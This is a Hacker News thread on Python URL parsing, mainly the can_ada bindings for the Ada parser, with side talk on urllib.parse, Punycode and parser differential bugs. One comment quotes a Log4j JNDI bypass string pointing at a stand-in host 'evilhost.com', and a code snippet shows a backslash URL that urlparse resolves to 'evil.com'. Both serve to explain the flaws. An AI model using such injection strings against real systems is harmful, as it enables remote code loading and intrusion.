[HN Gopher] Parsing URLs in Python
___________________________________________________________________
Parsing URLs in Python
Author : ibobev
Score : 78 points
Date : 2024-03-16 16:53 UTC (6 hours ago)
(HTM) web link (tkte.ch)
(TXT) w3m dump (tkte.ch)
| memco wrote:
| This is intriguing to me for the performance and correctness
| reasons, but also if it makes the result more dev friendly than
| the urllib.parse tuple-ish-object result thing.
| Areading314 wrote:
| Hard to imagine the tradeoff of using a third party binary
| library developed this year vs just using urllib.parse being
| worth it. Is this solving a real problem?
| pyuser583 wrote:
| urllib.parse is a pain. We really need something more like
| pathlib.Path.
| masklinn wrote:
| That used to be werkzeug.urls, kinda (it certainly had a more
| convenient API than urllib.parse), but it was killed in
| Werkzeug 3.
| pyuser583 wrote:
| I remember and miss that. But I'm not going to install
| werkzeug just for the url parsing.
| d_kahneman7 wrote:
| Is it that inconvenient?
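| For comparison, here's what just adding one query parameter looks
| like with the stdlib (a small sketch; the URL is made up):

```python
from urllib.parse import urlsplit, urlunsplit, urlencode, parse_qsl

# Adding one query parameter takes a full split/modify/reassemble dance:
parts = urlsplit("https://example.com/search?q=ada")
query = dict(parse_qsl(parts.query))
query["page"] = "2"
new_url = urlunsplit(parts._replace(query=urlencode(query)))
print(new_url)  # https://example.com/search?q=ada&page=2
```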
| Ch00k wrote:
| There is https://github.com/gruns/furl
| AMCMneCy wrote:
| Also https://github.com/aio-libs/yarl
| pyuser583 wrote:
| Yes! That's the one I like!
| VagabundoP wrote:
| This library is very pythonic.
| joouha wrote:
| You might be interested in
| https://github.com/fsspec/universal_pathlib
| masklinn wrote:
| According to itself, it's solving the issue of parser
| differential vulnerabilities: urllib.parse is ad-hoc and
| pretty crummy, and the headliner function "urlparse" is
| literally the one you should not use under any circumstance:
| it follows RFC 1808 (maybe, anyway), which was deprecated by
| RFC 2396 _25 years ago_.
|
| The odds that any other parser uses the same broken semantics
| are basically nil.
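| The RFC 1808 legacy is visible in urlparse's extra "params"
| field, which silently splits ";"-parameters off the last path
| segment (a quick stdlib demo; the URL is invented):

```python
from urllib.parse import urlparse, urlsplit

u = "https://example.com/files/report;v=2?dl=1"

# urlparse follows RFC 1808 and peels ";v=2" off the path...
p = urlparse(u)
print(p.path, "|", p.params)   # /files/report | v=2

# ...while urlsplit (closer to RFC 3986) leaves the path alone.
s = urlsplit(u)
print(s.path)                  # /files/report;v=2
```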
| Areading314 wrote:
| It seems unlikely that this C++ library written by a solo dev
| is somehow more secure than the Python standard library would
| be for such a security-sensitive task.
| masklinn wrote:
| Not in the sense of differential vulnerabilities, since the
| standard library _refuses_ to match any sort of modern
| standard.
|
| It's also
|
| 1. not a solo dev
|
| 2. Daniel Lemire
|
| 3. a serious engineering _and_ research effort:
| https://arxiv.org/pdf/2311.10533.pdf
| Areading314 wrote:
| This is the commit history:
| https://github.com/TkTech/can_ada/commits/main/
|
| I guess you are right that there are 2 commits from a
| different dev, so it is technically not a solo project. I
| still wouldn't ever use this in production code.
| bqmjjx0kac wrote:
| The can_ada repo threw me off, too. It looks super
| amateurish because of the lack of tests, fuzzers, etc.
|
| But it appears that they've just exported the meat of the
| Ada project and left everything else upstream.
| masklinn wrote:
| ...
|
| can_ada is just the python bindings.
|
| The actual underlying project is at
| https://github.com/ada-url/ada
| TkTech wrote:
| Hi, can_ada (but not ada!) dev here. Ada is over 20k lines
| of well-tested and fuzzed source by 25+ developers, along
| with an accompanying research paper. It is the parser used
| in node.js and parses billions of URLs a day.
|
| can_ada is simply 60 lines of glue and packaging that make it
| available with low overhead to Python.
| woodruffw wrote:
| I agree that the stdlib parser is a mess, but as an
| observation: replacing one use of it with a (better!)
| implementation _introduces_ a potential parser differential
| where one didn't exist before. I've seen this issue crop up
| multiple times in real Python codebases, where a well-
| intentioned developer adds a differential by incrementally
| replacing the old, bad implementation.
|
| That's the perverse nature of "wrong but ubiquitous" parsers:
| unless you're confident that your replacement is _complete_,
| you can make the situation worse, not better.
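| A classic instance of that differential, using only the stdlib
| (the WHATWG side is described in comments): WHATWG parsers
| normalize "\" to "/", urlparse does not.

```python
from urllib.parse import urlparse

# WHATWG-compliant parsers (browsers, Ada) treat "\" like "/",
# so they see host "example.com". urlparse treats the backslash
# as ordinary data, so everything up to the last "@" becomes
# userinfo and the reported host is evil.com.
p = urlparse("https://example.com\\@evil.com/")
print(p.hostname)  # evil.com
```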
| Spivak wrote:
| > unless you're confident that your replacement is complete
|
| And that any 3rd party libs you use also don't ever call
| the stdlib parser internally because you do not want to
| debug why a URL works through some code paths but not
| others.
|
| Turns out that url parsing is a cross-cutting concern like
| logging where libs should defer to the calling code's
| implementation but the Python devs couldn't have known that
| when this module was written.
| pyuser583 wrote:
| The Ada programming language is cursed with overlapping acronyms.
| GPS, ADA, SPARK, AWS. Seems it just got a little bit worse.
| Solvency wrote:
| It is _mindboggling_ to me how often developers create project
| names without even _trying_ to search for precedent names _in
| their own domain/industry_.
|
| Calling this Ada is just ridiculous.
| pyuser583 wrote:
| Ada needs to fight back. Java templating library! Python
| dependency resolver! Zag image manipulation library! SQL
| event logging persistence framework!
|
| I can't believe Amazon wasn't violating some anti-competition
| rule by using "AWS" for "Amazon Web Services" when it already
| meant "Ada Web Server."
|
| Wow, when I search for "Ada GPS" I get global positioning
| system support libraries before GNAT Programming Studio.
| gjvc wrote:
| yes but they think it's punny/funny/clever
| masklinn wrote:
| > Ada is a WHATWG-compliant and fast URL parser written in
| modern C++
|
| Why would you do that, Daniel?
| TkTech wrote:
| Hah :) It's named after Yagiz Nizipli's (Ada dev) newborn
| daughter, Ada.
| EmilStenstrom wrote:
| At least the name can_ada (canada!) makes it a little more
| unique.
| ulrischa wrote:
| Parsing a URL is really a pain in the a*
| SloopJon wrote:
| Another post in this thread was downvoted and flagged (really?)
| for claiming that URL parsing isn't difficult. The linked
| article claims that "Parsing URLs _correctly_ is surprisingly
| hard." As a software tester, I'm very willing to believe that,
| but I don't know that the article really made the case.
|
| I did find a paper describing some vulnerabilities in popular
| URL parsing libraries, including urllib and urllib3. Blog post
| here:
|
| https://claroty.com/team82/research/exploiting-url-parsing-c...
|
| Paper here:
|
| https://web-assets.claroty.com/exploiting-url-parsing-confus...
|
| If you remember the Log4j vulnerability from a couple of years
| ago, that was a URL parsing bug.
| masklinn wrote:
| > If you remember the Log4j vulnerability from a couple of
| years ago, that was a URL parsing bug.
|
| I don't think that's a fair description of the issue.
|
| The log4j vulnerability was that it specifically added JNDI
| support (https://issues.apache.org/jira/browse/LOG4J2-313) to
| property substitution (https://logging.apache.org/log4j/2.x/
| manual/configuration.ht...), which it would apply on logged
| messages. So it was a pretty literal feature of log4j. log4j
| would just pass the URL to JNDI for resolution, and
| substitute the result.
| SloopJon wrote:
| I didn't look into this in detail at the time, but the
| report's summary of CVE-2021-45046 is that the parser that
| validated a URL behaved differently from the separate parser
| used to fetch it, so a URL like
| jndi:ldap://127.0.0.1#.evilhost.com:1389/a
|
| is validated as 127.0.0.1, which may be whitelisted, but
| fetched from evilhost.com, which probably isn't.
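| The two-parser mismatch is easy to reproduce in miniature (a toy
| sketch, not Log4j's actual code; `naive_host` stands in for the
| lookup side):

```python
from urllib.parse import urlsplit

url = "ldap://127.0.0.1#.evilhost.com:1389/a"

# The "validator" uses a real parser: "#" starts the fragment,
# so the host is 127.0.0.1 -- looks safely whitelisted.
print(urlsplit(url).hostname)  # 127.0.0.1

# The "fetcher" naively takes everything between "//" and the
# next "/" as the host, fragment and all.
def naive_host(u: str) -> str:
    return u.split("//", 1)[1].split("/", 1)[0]

print(naive_host(url))  # 127.0.0.1#.evilhost.com:1389
```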
| bqmjjx0kac wrote:
| Writing a new parser in C++ is a mistake IMO. At the very least,
| you need to write a fuzzer. At best, you should be using one of
| the many memory safe languages available to you.
|
| I retract my criticism if this project is just for fun.
|
| Edit: downvoters, do you disagree?
|
| Edit2: OK, I may have judged a bit prematurely. _Ada_ itself has
| fuzzers and tests. They're just not exported to the _can_ada_
| project.
| VagabundoP wrote:
| Okay, so some googling told me that "xn--" means the rest of
| the hostname is encoded Unicode, but why does é become -fsa in
| www.xn--googl-fsa.com?
|
| Google failed on the second part.
| whalesalad wrote:
| It's called an IDN. The encoding format is called Punycode; it
| transforms internationalized domain names into ASCII.
| js2 wrote:
| Because that's the Punycode representation:
|
| https://en.wikipedia.org/wiki/Punycode
|
| https://www.punycoder.com/
| ekimekim wrote:
| To expand on the sibling comments: This encoding (called
| Punycode) works by combining the character to encode (e) and
| the position the character should be in (the 7th position out
| of a possible 7) into a single number. e is 233, there are 7
| possible positions, and it is in position 6 (0-indexed) so that
| single number is 233 * 7 + 6 = 1637. This is then encoded via a
| fairly complex variable-length encoding scheme into the letters
| "fsa".
|
| See https://en.wikipedia.org/wiki/Punycode#Encoding_the_non-ASCI...
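| Python can show both halves of this with its built-in codecs (a
| quick check; note "punycode" encodes a bare label, while "idna"
| adds the "xn--" ACE prefix):

```python
# The stdlib "punycode" codec encodes a single label...
print("googlé".encode("punycode"))  # b'googl-fsa'

# ...and the "idna" codec wraps it in the xn-- ACE prefix.
print("googlé".encode("idna"))      # b'xn--googl-fsa'
```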
| bormaj wrote:
| Why not just use `httpx`? If you're not bound to the stdlib,
| it's a great alternative to `requests` and does URL parsing too.
| kmike84 wrote:
| The URL parsing in httpx follows RFC 3986, which is not the
| same as the WHATWG URL Living Standard.
|
| An RFC 3986 parser may reject URLs that browsers accept, or
| handle them differently. The WHATWG URL Living Standard tries
| to put real browser behavior on paper, so it's a much better
| standard if you need to parse URLs extracted from real-world
| web pages.
| gjvc wrote:
| httpx is great, and "needs to be in base"
| ojbyrne wrote:
| Looking at the github site for can_ada, I discovered that the
| developers live in Montreal, Canada. Nice one.
| TkTech wrote:
| I do! :) I should probably also never be allowed to name
| things.
| kmike84 wrote:
| A great initiative!
|
| We need a better URL parser in Scrapy, for similar reasons. Speed
| and WHATWG standard compliance (i.e. do the same as web browsers)
| are the main things.
|
| It's possible to get closer to WHATWG behavior by using urllib
| and some hacks. This is what https://github.com/scrapy/w3lib
| does, which Scrapy currently uses. But it's still not quite
| compliant.
|
| Also, surprisingly, on some crawls URL parsing can consume CPU
| time comparable to HTML parsing.
|
| Ada / can_ada look very promising!
| TkTech wrote:
| can_ada dev here. Scrapy is a fantastic project, we used it
| extensively at 360pi (now Numerator), making trillions of
| requests. Let me know if I can help :)
___________________________________________________________________
(page generated 2024-03-16 23:00 UTC)